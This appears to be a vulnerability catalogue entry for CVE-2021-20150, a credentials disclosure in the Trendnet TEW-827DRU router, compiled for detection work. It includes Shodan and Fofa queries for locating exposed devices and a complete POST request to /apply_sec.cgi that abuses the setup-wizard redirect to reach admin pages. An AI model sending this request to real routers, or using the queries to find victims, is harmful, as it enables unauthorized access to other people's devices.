🔙 목록으로 돌아가기

CVE-2021-20150: Trendnet AC2600 TEW-827DRU - Credentials Disclosure

TitleTrendnet AC2600 TEW-827DRU - Credentials Disclosure
Authorgy741
SeverityMedium
ImpactAn attacker can obtain sensitive credentials, leading to unauthorized access to the router.
RemediationUpdate the router firmware to the latest version to fix the vulnerability.
CVSS Score5.3
EPSS Score0.35186
CVE IDCVE-2021-20150
CWE IDCWE-306
Shodan Queryhttp.html:"TEW-827DRU"http.html:"tew-827dru"
Fofa Querybody="tew-827dru"
Tags cve2021 cve disclosure router tenable trendnet vuln

🔍 Vulnerability Description

Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.

🌐 HTTP Request

POST /apply_sec.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 99
Accept-Encoding: gzip

action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20150.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-20150.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A